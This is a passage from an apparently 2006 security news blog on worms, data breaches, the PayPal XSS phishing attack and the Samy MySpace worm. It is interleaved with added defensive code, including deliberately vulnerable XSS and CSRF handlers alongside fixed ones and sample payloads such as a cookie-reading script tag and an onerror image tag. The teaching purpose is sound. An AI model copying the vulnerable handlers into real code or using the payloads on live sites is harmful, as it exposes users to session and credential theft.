Both Nael and Secunia have posted public proof of concept (PoC) code that demonstrates the flaw in action. Microsoft Security Response Center (MSRC) staffer Adrian Stone indicated on the MSRC blog that Microsoft was aware of the issue and is investigating. Microsoft is currently unaware of any attacks that take advantage of the flaw.

Sunday, July 02, 2006

Security analysts have detected a new piece of malware that appears to run as a Microsoft Corp. program used to detect unlicensed versions of its operating system. Sophos is calling it W32.Cuebot-K, a new variation in the Cuebot family of malware. The worm has a range of malicious functions. After it's installed, the worm immediately tries to connect to two Web sites, a sign it may try to download other bad programs on the machine. Cuebot-K can disable other software, shut off the Windows firewall, download new malicious programs, perform basic distributed denial-of-service attacks, scan local files and spawn a command prompt, Sophos said.
W32/Cuebot-K is an instant-messaging worm and backdoor for the Windows platform. W32/Cuebot-K spreads via AOL Instant Messenger.
When first run, W32/Cuebot-K copies itself to <Windows system folder>\wgavn.exe and creates the file <Windows folder>\Debug\dcpromo.log.
The file wgavn.exe is registered as a new system driver service named "wgavn", with a display name of "Windows Genuine Advantage Validation Notification" and a startup type of automatic, so that it is started automatically during system startup. Registry entries are created under:
HKLM\SYSTEM\CurrentControlSet\Services\wgavn\
W32/Cuebot-K sets the following registry entries, disabling the automatic startup of other software:
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess Start 4
Registry entries are set as follows:
HKLM\SOFTWARE\Microsoft\Ole EnableDCOM n
HKLM\SYSTEM\CurrentControlSet\Control\Lsa restrictanonymous 1
Registry entries are created under:
HKLM\SOFTWARE\Microsoft\security center\
HKLM\SOFTWARE\Policies\Microsoft\windowsfirewall\domainprofile\
HKLM\SOFTWARE\Policies\Microsoft\windowsfirewall\standardprofile\
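The file, service and registry indicators listed above, together with the bot file names from the August 14 MS06-040 note (wgareg.exe and wgavm.exe), make a small host-side check. The following Python script is an added example, not Sophos's or eEye's tooling: it parses a constructed Windows .reg export (built for this example) and reports any service whose binary is one of those file names, the SharedAccess service set to Start=4, EnableDCOM set to N, and restrictanonymous set to 1. The Computer Browser service in the sample is ordinary and is there for contrast.

```python
import re

# Constructed sample: an excerpt in Windows .reg export format from a
# hypothetical host, built for this example. It carries the entries the
# Cuebot-K write-up lists plus an ordinary service for contrast.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Browser]
"DisplayName"="Computer Browser"
"ImagePath"="C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wgavn]
"DisplayName"="Windows Genuine Advantage Validation Notification"
"ImagePath"="C:\\WINDOWS\\system32\\wgavn.exe"
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]
"EnableDCOM"="N"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"restrictanonymous"=dword:00000001
"""

# File names the two write-ups on this page associate with the bots.
BOT_BINARIES = {"wgareg.exe", "wgavm.exe", "wgavn.exe"}
SERVICES_PREFIX = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services" + "\\"

VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')


def parse_reg(text: str) -> dict:
    """Parse a .reg export into {key: {value_name: value}}.

    Handles quoted strings (backslashes are doubled in .reg files) and
    dword:XXXXXXXX hex integers, which are the two forms used here.
    """
    keys = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m is None or current is None:
            continue
        name, raw = m.group(1), m.group(2)
        if raw.startswith("dword:"):
            value = int(raw[len("dword:"):], 16)
        elif len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
            value = raw[1:-1].replace("\\\\", "\\")
        else:
            value = raw
        keys[current][name] = value
    return keys


def values_at(keys: dict, wanted: str) -> dict:
    """Case-insensitive lookup of one key's values (registry paths are
    case-insensitive and exports are not consistently cased)."""
    for key, values in keys.items():
        if key.lower() == wanted.lower():
            return values
    return {}


def check_indicators(keys: dict) -> list:
    """Return human-readable findings for the indicators the write-ups list."""
    findings = []
    # 1. Any service whose binary is one of the bot file names.
    for key, values in keys.items():
        if not key.lower().startswith(SERVICES_PREFIX.lower()):
            continue
        image = str(values.get("ImagePath", ""))
        binary = image.split()[0].replace("/", "\\").rsplit("\\", 1)[-1].lower() if image else ""
        if binary in BOT_BINARIES:
            service = key.rsplit("\\", 1)[-1]
            findings.append("service %s runs %s (bot file name)" % (service, binary))
    # 2. Settings the Cuebot-K write-up says the worm changes.
    expected = [
        (SERVICES_PREFIX + "SharedAccess", "Start", 4,
         "SharedAccess (Windows Firewall/ICS) Start=4: disabled at boot"),
        (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole", "EnableDCOM", "n",
         "Ole EnableDCOM=N: DCOM disabled"),
        (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa", "restrictanonymous", 1,
         "Lsa restrictanonymous=1"),
    ]
    for key, name, want, text in expected:
        got = values_at(keys, key).get(name)
        if isinstance(got, str) and isinstance(want, str):
            hit = got.lower() == want.lower()
        else:
            hit = got == want
        if hit:
            findings.append(text)
    return findings


if __name__ == "__main__":
    for finding in check_indicators(parse_reg(SAMPLE_REG)):
        print("FINDING:", finding)
```

On a real host the input would be the output of `reg export` for the keys concerned; the string comparisons are case-insensitive because the registry is, and the SharedAccess, DCOM and restrictanonymous settings are only meaningful as a group, since each of them can also be set legitimately by policy.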

Monday, June 26, 2006
Five spreadsheet files with personal data on approximately 28,000 sailors and family members were found on an open Web site, the U.S. Navy announced June 23. The personal data included the name, birth date and social security number on several Navy members and dependents. The Navy said it was notified on June 22 of the breach and is working to identify and notify the individuals affected.
"There is no evidence that any of the data has been used illegally. However, individuals are encouraged to carefully monitor their bank accounts, credit card accounts and other financial transactions," the Navy said in a statement. It said individuals affected by the breach will be contacted soon to ensure they have information on how to guard against identity theft. Information on how to watch for suspicious activity on personal accounts has been posted on the NPC (Navy Personnel Command) Web site.
The files have been removed from the site, and the Navy's chief of personnel is working with law enforcement to determine how and when the files were placed on the Web and to prevent future release of information of this type, the statement said. The U.S. Navy becomes the third government department to confirm data loss through computer theft or server compromise. Earlier this week, the Agriculture department said about 26,000 of its employees and contractors could be at risk of identity theft after a hacker broke into its computer system.
A laptop stolen from a government employee in Maryland in May also exposed personal data on about 26.5 million veterans and current military troops.

Sunday, June 25, 2006
Mr. Ofer Shezaf, chief technology officer, Breach Security, Inc., and an officer of the Web Application Security Consortium (WASC), will lead the new Web Hacking Incidents Database project, a new initiative designed to track all reported Web application security breaches. WASC is an international group of security experts and industry leaders that develop, adopt, and advocate best-practice security standards for web application security. WASC maintains a number of projects to generate web application security awareness, classify threats against web applications, and provide evaluation criteria for web application security solutions.
The new Web Hacking Incidents Database (WHID) project tracks publicly-reported security incidents that can be associated with Web application security vulnerabilities exploited through targeted attacks. The goal of the new project is to provide a tool to raise awareness of Web application security problems and provide information for statistical analysis of Web applications security incidents.
In the United States and Europe there are privacy laws that require public reporting of security breaches; however, these reports do not indicate how the breach occurred. The new WHID tracks such security breaches, assisting IT managers and business leaders in assessing the threat posed by insecure web applications and in better protecting their business-critical information assets. Additional information about the new database can be found at the project's web site at www.webappsec.org/projects/whid.

Wednesday, June 21, 2006
Bit9, Inc. has compiled a list of the top 15 applications with known vulnerabilities. Often installed outside of IT's knowledge or control, these popular applications run unnoticed by enterprise IT organizations and are difficult to find and remove. The list was designed to help IT departments regain control over their desktop environments.
Each application on the list has the following characteristics:
- is well-known in the consumer space and frequently downloaded by individuals;
- is not classified as malicious software by enterprise IT organizations;
- contains at least one critical vulnerability registered in the U.S.(NIST) vulnerability database;
- has a severity rating of between 7.0 - 10.0 (high) on the CVSS scoring system;
- relies on the end user, rather than a central administrator, to manually patch or upgrade the software to eliminate the vulnerability, if such a patch exists.
"These popular software applications are frequently downloaded to corporate desktops and can present serious risks for enterprise computing environments," said Dr. Todd Brennan, co-founder and CTO at Bit9. "Understanding what software is actually running in your organization across your entire desktop environment is the first step in regaining application control and protecting your corporate infrastructure."
Five of the top 15 applications with known vulnerabilities include:
1. Mozilla Firefox 1.0.7
2. Apple iTunes 6.02 & Quicktime 7.0.3
3. Skype Internet phone 1.4
4. Adobe Acrobat Reader 7.02, 6.03
5. Sun Java Run-Time Environment 5.0 Update 3, JRE 1.4.2_08
To obtain a copy of the research brief entitled "15 Popular Applications with Critical Vulnerabilities," please visit http://www.bit9.com/15apps.html. Readers will learn how to gain visibility and control of enterprise desktops and laptops to streamline IT, enforce policy compliance, and eliminate unwanted software.
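As an added illustration of the criteria behind the list (not Bit9's research or tooling), the following Python script checks a constructed software inventory against a constructed advisory table: a version-string comparison that copes with forms like "1.4.2_08" and "5.0 Update 3", the 7.0 CVSS cut-off for the "high" band, and the end-user-patched criterion. The fixed-in versions and CVSS scores are made-up placeholders that describe no real vulnerability; only the installed versions for Firefox and the JRE are taken from the list above, and the two "Example" applications are fictional.

```python
import re

CVSS_HIGH_MIN = 7.0  # lower bound of the 7.0-10.0 "high" band in the criteria


def version_key(version: str) -> tuple:
    """Turn '1.4.2_08', '7.0.3' or '5.0 Update 3' into a tuple of ints.

    Tuples compare element by element, so (1, 4, 2, 8) < (1, 4, 2, 10) as
    intended, and a missing trailing component sorts below a present one.
    """
    return tuple(int(part) for part in re.findall(r"\d+", version))


# Constructed software inventory for a hypothetical desktop.
INVENTORY = [
    {"app": "Mozilla Firefox", "version": "1.0.7"},
    {"app": "Sun Java Runtime Environment", "version": "1.4.2_08"},
    {"app": "Example Media Player", "version": "2.1.0"},
    {"app": "Example Chat Client", "version": "1.0"},
]

# Constructed advisory table. The fixed-in versions and CVSS scores are
# placeholders for this example and do NOT describe real vulnerabilities.
ADVISORIES = [
    {"app": "Mozilla Firefox", "fixed_in": "1.0.99", "cvss": 7.5, "user_patched": True},
    {"app": "Sun Java Runtime Environment", "fixed_in": "1.4.2_99", "cvss": 9.3, "user_patched": True},
    {"app": "Example Media Player", "fixed_in": "2.0.5", "cvss": 8.1, "user_patched": True},
    {"app": "Example Chat Client", "fixed_in": "1.1", "cvss": 4.3, "user_patched": True},
]


def find_exposed(inventory, advisories, min_cvss=CVSS_HIGH_MIN):
    """Installed apps that are below the fixed-in version of an advisory at or
    above min_cvss and that depend on the end user to apply the fix.

    Returns (app, installed, fixed_in, cvss) tuples, highest CVSS first.
    """
    exposed = []
    for item in inventory:
        for adv in advisories:
            if adv["app"] != item["app"] or not adv["user_patched"]:
                continue
            if adv["cvss"] < min_cvss:
                continue
            if version_key(item["version"]) < version_key(adv["fixed_in"]):
                exposed.append((item["app"], item["version"], adv["fixed_in"], adv["cvss"]))
    return sorted(exposed, key=lambda e: e[3], reverse=True)


if __name__ == "__main__":
    for app, installed, fixed_in, cvss in find_exposed(INVENTORY, ADVISORIES):
        print(f"{app}: {installed} installed, fixed in {fixed_in} (CVSS {cvss})")
```

With the sample data the media player is already above its placeholder fix and the chat client falls below the 7.0 threshold, so only the two user-patched, high-severity entries are reported. Numeric tokenisation is deliberately simple; vendors that print "7.02" for 7.0.2 need their own normalisation before this comparison is trustworthy.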

Saturday, June 17, 2006
A cross-site scripting flaw in the PayPal Web site allows a new phishing attack to masquerade as a genuine PayPal log-in page with a valid security certificate, according to security researchers.
Fraudsters are exploiting the flaw to harvest personal details, including PayPal log-ins, Social Security numbers and credit card details, according to staff at Netcraft Ltd., an Internet services company in Bath, England. The PayPal site, owned by eBay Inc., allows users to make online payments to one another, charged to their credit cards, and log-in credentials for the service are a prized target of fraudsters.
The attack works by tricking PayPal members into following a maliciously crafted link to a secure page on PayPal's site. Anyone thinking to check the site's security certificate at this point will see that it is a valid 256-bit certificate belonging to the site, Netcraft employee Paul Mutton wrote in the company's blog on Friday.
However, the URL (uniform resource locator) exploits a flaw in PayPal's site that allows the fraudsters to inject some of their own code into the page that is returned, he wrote. In this case, the result is a warning that the user's account may have been compromised, and that they "will now be redirected to Resolution Center." The page to which they are redirected asks for their PayPal account details -- but thanks to the cross-site scripting flaw in the PayPal site, and the data injected into the URL by the fraudsters, the page is no longer on the PayPal site. Instead, the page steals the log-in details and sends them to the fraudsters' server, then prompts the user for other personal information, Mutton said.
The Web server harvesting the personal details is hosted in Korea, Mutton said. If the malicious link arrived by e-mail, then "there would be clues in the mail that it's not genuine," he said. "It's a technique chosen by fraudsters because it is hard to spot."
Organizations considering the use of Asynchronous JavaScript and XML (AJAX) technologies to create more dynamic Web sites need to ensure they are not inadvertently opening doors into otherwise secure applications, analysts warned. While AJAX by itself doesn't create new security risks, it has a tendency to amplify the seriousness of several well-understood threats, including SQL injections, cross-site scripting and denial-of-service attacks, they said.
A case in point is this week's mass-mailing Yamanner worm, which took advantage of an apparent cross-site scripting error in Yahoo Inc.'s e-mail service to infect thousands of computers. The worm arrived in Yahoo e-mail users' in-boxes bearing the subject header "New Graphic Site" and was activated simply by a user opening the infected e-mail.
The worm used JavaScript functions in a user's browser to access Yahoo's e-mail service and perform actions on behalf of the user -- such as looking for names in the Yahoo address list and sending them e-mails containing copies of the worm -- without the user's knowledge. Such threats can be amplified in Web applications built with AJAX if proper care is not taken to validate user requests coming in via the browser, said Billy Hoffman, lead R&D engineer at Web security vendor SPI Dynamics in Atlanta.
AJAX is a programming technique that allows companies to make their Web sites more responsive to user input than pages built with HTML by enabling new content to be added to a Web page without needing the entire page to be reloaded. The task is accomplished by allowing the browser to fetch small amounts of data from the Web server from which the content is loaded using JavaScript and XML technologies.
The approach is more efficient than having an entire Web page reload every time content needs to be refreshed. But it also increases the amount of traffic flowing between the browser and the Web server, thus increasing the potential for attacks such as the Yamanner worm.
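The PayPal attack above and the Yamanner worm share one defect: untrusted input reflected into a page as markup, after which any script in it runs with the site's own cookies attached. The following Python example is added here and is not PayPal's, Yahoo's or Netcraft's code. It shows a reflecting handler in its vulnerable and its escaped form, and a check for the "redirect to Resolution Center" step that allows a redirect parameter to point only at the site itself. The hostname example.com and the parameter names are placeholders.

```python
import html
from urllib.parse import parse_qs, urlsplit

SITE_HOST = "example.com"  # placeholder for the site's own hostname


def get_param(query_string: str, name: str) -> str:
    """First value of a query-string parameter, or '' if it is absent."""
    return parse_qs(query_string).get(name, [""])[0]


def render_vulnerable(query_string: str) -> str:
    """Reflects the 'msg' parameter into the page unchanged.

    A crafted link carrying HTML in 'msg' therefore lands in the page body
    as markup, and the browser runs it in the site's origin.
    """
    msg = get_param(query_string, "msg")
    return "<html><body><p>" + msg + "</p></body></html>"


def render_hardened(query_string: str) -> str:
    """Same page with the parameter HTML-escaped before it is reflected,
    so '<' and '>' reach the browser as text, not tags."""
    msg = get_param(query_string, "msg")
    return "<html><body><p>" + html.escape(msg, quote=True) + "</p></body></html>"


def safe_redirect_target(target: str) -> bool:
    """Allow only same-site redirect targets.

    Relative paths must not start with '//' (a scheme-relative URL names
    another host); absolute URLs must be https on the site's own host; any
    other scheme, such as javascript:, is refused.
    """
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        return parts.scheme == "https" and parts.netloc.lower() == SITE_HOST
    return target.startswith("/") and not target.startswith("//")


if __name__ == "__main__":
    # Constructed query string carrying a script tag in the reflected parameter.
    crafted = "msg=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E"
    print(render_vulnerable(crafted))
    print(render_hardened(crafted))
    for target in ("/help", "//evil.example.net/", "https://example.com/x", "javascript:alert(1)"):
        print(target, safe_redirect_target(target))
```

Escaping on output is the fix that closes both the PayPal page and the e-mail body case; the AJAX point in the paragraphs above is that every extra endpoint the browser can call is another place where the same escaping and request validation has to be applied.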

Wednesday, June 14, 2006
We download the Malicious Software Removal Tool in our updates all the time, though it seems few know how to use it. Of course MS wants us all to go to its site and run a web page to get the results: http://www.microsoft.com/security/malwareremove/default.mspx (you can also go to http://www.microsoft.com/athome/security/viruses/malware.mspx). Personally, I think most people do not want to go to a web page to do this.
I also discovered it can be run in an automated way, and it is rather straightforward. However, I doubt your grandma will get it: http://support.microsoft.com/kb/891716
I would rather be sure you are on your game, granny. So go Start/Run, type MRT, and there it is. The wizard interface will let you do quick, full and custom scans. It will also quickly tell you how current you are and what malware can be removed.

Command-line switches:
- /Q or /quiet - Use quiet mode. This option suppresses the user interface of the tool.
- /? - Display a dialog box that lists the command-line switches.
- /N - Run in detect-only mode. In this mode, malicious software will be reported to the user but will not be removed.
- /F - Force an extended scan of the computer.
- /F:Y - Force an extended scan of the computer and automatically clean any infections found.
U.S. government efforts to require most voice-over-IP providers to permit law enforcement agencies to wiretap phone calls could introduce new security problems to the Internet, a group of Internet security experts said today.
A Federal Communications Commission rule requiring providers to allow wiretapping by May 2007 would either require a massive re-engineering of the Internet or introduce broad cybersecurity risks, said authors of a new study released by the Information Technology Association of America (ITAA), an IT vendor trade group. In addition, the requirements would stall Internet innovations in the U.S. by adding hundreds of thousands of dollars in setup and maintenance costs to providers and potentially to other Internet applications that provide voice services, including instant messaging and online games, said the study.
The study, co-authored by several people, including TCP/IP co-creator Vinton Cerf, public-key cryptography pioneer Whitford Diffie and former National Security Agency encryption scientist Clinton Brooks, comes days after a U.S. appeals court upheld the FCC's wiretapping rules. On Friday, the U.S. Court of Appeals for the District of Columbia upheld the ruling, requiring that providers offering a substitute for traditional telephone service comply with a 1994 telephone wiretapping law called the Communications Assistance for Law Enforcement Act (CALEA) (see "Court upholds VoIP wiretapping").
The FCC did not immediately respond to a request for comments about the ITAA study. But on Friday, FCC Chairman Kevin Martin said allowing law enforcement wiretapping of calls is of "paramount importance" to U.S. security.
In one of the largest security updates since moving to a monthly patch release cycle, Microsoft Corp. today issued 12 bulletins detailing fixes for 21 separate vulnerabilities in a wide range of products. Eight of the bulletins and 12 of the vulnerabilities were rated "critical" by the company. Three bulletins detailed fixes for "important" flaws, while one described a flaw of moderate severity. The vulnerabilities disclosed today affect several Microsoft products, including Internet Explorer (IE), Windows Media Player, Microsoft Outlook and PowerPoint.
Today's announcement is "certainly one that people need to sit up and take notice of," said Michael Sutton, director of VeriSign Inc.'s iDefense Labs. He also noted that most of the critical flaws disclosed today are on the client side, highlighting a continuing trend away from server-side security issues. "Client-side vulnerabilities have become one of the most prominent methods by which computers become infected today," Oliver Friedrichs, director of Symantec Corp.'s security response group, said in a statement. "Today's release continues that trend" and highlights the danger users face simply by visiting certain Web sites, he said.
One of the bulletins rated as critical by Microsoft described a cumulative upgrade for Internet Explorer that fixed eight newly discovered flaws in the company's Web browser. The impact of the flaws included remote code execution, information disclosure and user spoofing, according to Microsoft. Another bulletin offers a fix for a critical vulnerability in how Windows handles the ART image format used by America Online Inc.'s client software. An attacker could exploit the flaw by creating a specially crafted ART image that would allow for remote-code execution on a victim's computer.
Another critical remote-code execution vulnerability disclosed today involves Microsoft Windows Media Player technology. The buffer-overflow flaw exists in the way Media Player handles the Portable Network Graphics (PNG) image format associated with Media Player and could allow an attacker to take complete control of an affected system, the company warned. In addition, security administrators should pay particular attention to the vulnerabilities detailed in bulletins MS06-025 and MS06-029, according to an advisory from McAfee Inc.

Tuesday, June 13, 2006
Microsoft Corp. is set to release research showing, among other things, that its security tools find malicious software on about one in every 311 times it scans a PC. The research is part of a major report on security trends that Microsoft plans to release today at its TechEd user conference in Boston.
Microsoft's data is remarkable because it comes from such a large sample group -- more than 270 million users of the Windows Malicious Software Removal Tool, which ships with Windows. Between January 2005 and March 2006, that tool was used to remove 16 million pieces of malware from 5.7 million computers. The software was used to scan systems 2.7 billion times during that period, and on average, it finds something malicious about 0.32% of the time, or in one out of every 311 scans, according to Microsoft.
Microsoft couldn't say what percentage of PCs have been infected by malicious software. Although 5.7 million out of 270 million PCs would translate to about 1 in 47 machines, the total number of computers scanned was far greater than 270 million, so the actual rate of infection is much lower, according to Microsoft.
There has been no widespread virus outbreak for several years, but users are increasingly concerned about targeted attacks, identity theft and dangerous rootkit software, which covers its own tracks on the computer. So does Microsoft think things are getting better, or worse? "That's a difficult question to answer," said Matthew Braverman, a program manager with Microsoft's antimalware team. He noted that it's impossible to get a complete picture of everything that the bad guys are doing but said that he does think things are improving.
The amount of malware in circulation has dropped for 41 of the 53 families of worms, rootkits and viruses that Microsoft tracked over the past 15 months. And the occurrence of 21 of these variants has dropped by a lot -- more than 71%, according to Braverman. "I think that shows that the malware problem is getting better," he said.

Saturday, May 27, 2006
Security researchers at eEye Digital Security Inc. have discovered a serious flaw in Symantec Corp.'s enterprise antivirus software that could be used by hackers to create a self-replicating "worm" attack against Symantec users.
Because Symantec has not yet confirmed the existence of the problem, much less patched it, eEye is offering few details on the vulnerability, which was first disclosed late Wednesday.
"This is definitely a wormable flaw," said Mike Puterbaugh, eEye's vice president of marketing. "It does allow you to take remote control of the system." Similar to viruses, worms are able to spread from computer to computer, and past attacks such as 2003's Blaster and Slammer worms were widespread. Symantec is evaluating eEye's claims and "if necessary, will provide a prompt response and solution," a Symantec spokesman said today.
eEye Chief Hacking Officer Marc Maiffret believes that it will take Symantec a "month or two" to patch the problem. "The vulnerability is pretty straightforward for them to identify within their code," he said. Version 10 and greater of Symantec's enterprise antivirus software is affected by the flaw, but the company's consumer products do not have the bug, Maiffret said.
This is not the first flaw to be reported in Symantec's security products, which have increasingly come under the scrutiny of hackers and security researchers over the past year. Last December, researcher Alex Wheeler discovered a flaw in Symantec's Antivirus Library that could allow remote attackers to gain control of systems that used Symantec's products.

Tuesday, May 23, 2006
FOSTER CITY, CALIF – May 19, 2006 – Research experts at FaceTime Security Labs™ identified and reported a new threat today affecting Yahoo! Messenger. FaceTime researchers confirmed that a self-propagating worm, named yhoo32.explr, installs 'Safety Browser' and hijacks the Internet Explorer homepage, leading users to a site that puts spyware on their PCs. Because Safety Browser uses the IE icon, users can easily mistake it for Internet Explorer. This is the first recorded incidence of malware installing its own web browser on a PC without the user's permission.
The self-propagating worm spreads the infection to all contacts in Yahoo! Messenger by sending a website link that loads a command file onto the user's PC and installs Safety Browser. Spam sent over instant messaging (IM) in this way is called spim. IM applications and protocols are an increasingly popular vector for distributing malicious files and executables.
"This is one of the oddest and more insidious pieces of malware we have encountered in years," commented Tyler Wells, Senior Director of Research at FaceTime Security Labs. "This is the first instance of a complete web browser hijack without the user's awareness. Similar 'rogue' browsers, such as 'Yapbrowser', have demonstrated the potential for serious damage by directing end-users to potentially illegal or illicit material. 'Rogue' browsers seem to be the hot new thing among hackers."
The India research arm of FaceTime Security Labs discovered the threat in a 'honeypot', a trap they set to detect viruses, worms, spyware and other threats. Commentary on this threat by FaceTime Security Labs researcher Chris Boyd can be found on the Greynets Blog, at http://blog.spywareguide.com. FaceTime Security Labs is the threat research division of IM and Greynet security leader FaceTime Communications.
Threat name: yhoo32.explr
Threat type: Browserware and worm
Who is affected: Users of Yahoo! Messenger
Additional Information: The malware infects the PC with two elements. The first element is a web browser called "Safety Browser." This stand-alone application has no uninstaller and disguises itself with an Internet Explorer logo in some instances. The application also hijacks the personal homepage in Internet Explorer and points users to Safety Browser's homepage (demoplanet.tv). The hijack also plays looped music that cannot be stopped when the user starts up the PC or Safety Browser. The second element is the self-propagating worm. This worm installs an .exe file that spreads the infection through Yahoo Messenger to everyone on the Contacts List.

Monday, May 22, 2006
What if a computer geek could write a program that could make friends for him? That's what 19-year-old "Samy" did in October on the social networking site MySpace. Samy, who started programming at 12, was trying Ajax, the latest star of the Web 2.0 technologies. It stands for Asynchronous Javascript and XML, and in effect lets your browser talk to websites without you knowing about it. (There's a primer at http://tinyurl.com/7xzse.) Web users generally experience it as a smooth interaction that doesn't have to load a new page - like dragging a mouse around the Google Maps interface. Used on sites such as Odeo and Gmail, it allows them to be as interactive as desktop programs. But Samy found a sneakier power in Ajax.
MySpace, the seventh most popular English-language website according to Alexa Internet, allows people to set up pages as part of a "profile" and find others through their profiles; they can add those people as "friends".
"The idea was simple. I wanted anyone who viewed my profile to automatically add me as a friend," says Samy. "When I realised I could do this via Ajax, I figured I could replicate my Ajax code into any profile my code was modifying."
After some tweaking to get around the filters MySpace uses to stop JavaScript running in profiles, Samy put Ajax code on his MySpace page that ran automatically whenever anyone viewed his profile. Because Ajax can interact with pages the user never sees, his code pressed all the relevant buttons to add Samy to the viewer's friends list and added the words "but most of all, samy is my hero" to their page. Finally, the code copied itself into the viewer's profile, so that any MySpace user who then viewed that page was infected in turn. MySpace users had no indication that their browsers were doing anything unusual.
Forced to shut down
The code, strictly speaking a cross-site scripting worm, spread exponentially. Within 24 hours Samy had a million emails from MySpace users "wanting" to be his friend and calling him their "hero". MySpace was forced to shut down and make changes to stop Samy's code spreading. The MySpace Worm, as it came to be called, served as an alarming example of what malicious hackers could do, even if they only had access to your browser.
"The potential, or threat, with Ajax malware is that server communication is now hidden from the user," says Jesse James Garrett, who coined the term Ajax. "As a result the application can do things on your behalf without your knowledge." On a web page, Ajax can do as much as Javascript - though that's limited locally (it can't delete files apart from cookies on your computer). But it can do almost anything to a web page you have visible.
Garrett now consults for Adaptive Path, which has helped companies create their web experiences. He often explains the popularity of Ajax as a way of making sites feel faster and more feature-rich, and allowing more of the computational work of web application to happen on the user's computer. However, if a site isn't secure, it means your browser can step through complex actions, with you none the wiser.
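What the article describes, as an added example (this is not Samy's code, and MySpace's own code is not shown here): a toy profile service in JavaScript with the two weaknesses the worm depended on, stored content rendered without output encoding, and a friend-add action that trusts any request carrying the session cookie. Sessions, request objects and the sample payload are all constructed for the example.

```javascript
// Added illustration, not Samy's code and not MySpace's: the two server-side
// weaknesses a stored-XSS worm like the one above relies on, as a toy profile
// service with a vulnerable path and a hardened path for each.
// Everything here is hypothetical: in-memory sessions, plain-object requests.

// Contextual output encoding for HTML text and attribute values. Every
// character that can open a tag or close an attribute becomes an entity,
// so stored text is displayed but never parsed as markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// The kind of blocklist filter a site reaches for first: strips <script>
// blocks and the "javascript:" scheme, but knows nothing about event handlers.
function naiveFilter(s) {
  return String(s)
    .replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '')
    .replace(/javascript:/gi, '');
}

// Vulnerable: filtered text is interpolated straight into the page.
function renderProfileVulnerable(profile) {
  return `<div class="about">${naiveFilter(profile.about)}</div>`;
}

// Hardened: encode at the point of output, whatever was stored.
function renderProfileSafe(profile) {
  return `<div class="about">${escapeHtml(profile.about)}</div>`;
}

// Rough oracle for this example only: is there still a tag carrying an on*
// handler, or a raw <script> tag, in the rendered HTML?
function containsActiveMarkup(html) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(html) || /<script\b/i.test(html);
}

// Second weakness: a state-changing action that accepts any request carrying
// the victim's session cookie. Script running in the victim's browser sends
// that cookie automatically, so it can "press the button" on their behalf.
const sessions = new Map(); // sessionId -> { userId, csrfToken, friends }

function createSession(sessionId, userId, csrfToken) {
  sessions.set(sessionId, { userId, csrfToken, friends: new Set() });
  return sessions.get(sessionId);
}

function addFriendVulnerable(req) {
  const sess = sessions.get(req.cookie);
  if (!sess) return { ok: false, reason: 'no session' };
  sess.friends.add(req.body.friendId);
  return { ok: true };
}

function addFriendSafe(req) {
  const sess = sessions.get(req.cookie);
  if (!sess) return { ok: false, reason: 'no session' };
  if (req.body.csrfToken !== sess.csrfToken) {
    return { ok: false, reason: 'missing or wrong CSRF token' };
  }
  sess.friends.add(req.body.friendId);
  return { ok: true };
}

// Constructed payload: no <script> tag and no "javascript:", so the blocklist
// lets it through; the onerror handler fires as soon as the image fails to load.
const SAMPLE_PAYLOAD = '<img src="x" onerror="/* worm body would run here */">';

function demo() {
  const profile = { about: SAMPLE_PAYLOAD };
  createSession('sid-demo', 'victim', 'tok-demo');
  return {
    vulnerableStillActive: containsActiveMarkup(renderProfileVulnerable(profile)),
    safeStillActive: containsActiveMarkup(renderProfileSafe(profile)),
    addFriendNoToken: addFriendSafe({ cookie: 'sid-demo', body: { friendId: 'samy' } }),
    addFriendNoTokenOldCode: addFriendVulnerable({ cookie: 'sid-demo', body: { friendId: 'samy' } }),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Run it with node. Output encoding is the control that matters here: a CSRF token stops a request forged from another site, but a script already running inside the site's own origin can fetch the form and read the token, which is exactly the kind of "pressing the relevant buttons" the article describes. The token is still worth having for the cross-site case; it just does not substitute for encoding stored content.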

Sunday, May 21, 2006
Today, cyberscams are the fastest-growing criminal niche. Scores of banks and e-commerce giants, from JPMorgan Chase & Co. (JPM) to walmart.com (WMT), have been hit, sometimes repeatedly, by hackers and online fraud schemes. The 2005 FBI Computer Crime Survey estimated annual losses to all types of computer crime -- including attacks of viruses and other "malware," financial fraud, and network intrusions -- at $67 billion a year. Of the 2,066 companies responding to the survey, 87% reported a security incident. The U.S. Federal Trade Commission, which says identity theft is its top complaint, on May 10 created an Identity Theft Task Force following an executive order signed by President George W. Bush.
To track cybercrime, law enforcement officers work with companies such as eBay Inc. (EBAY) or Microsoft Corp. (MSFT) as well as with authorities around the globe. EBay has 60 people combating fraud, while Microsoft's Internet Safety Enforcement team has 65 operatives, including former law enforcement agents and federal prosecutors. To document the extent of the activity, BusinessWeek reporters also scoured underground Web sites where stolen data is swapped like so many baseball cards on eBay. Consider this e-mail promoting the launch of an online trading bazaar, vendorsname.ws, last year:
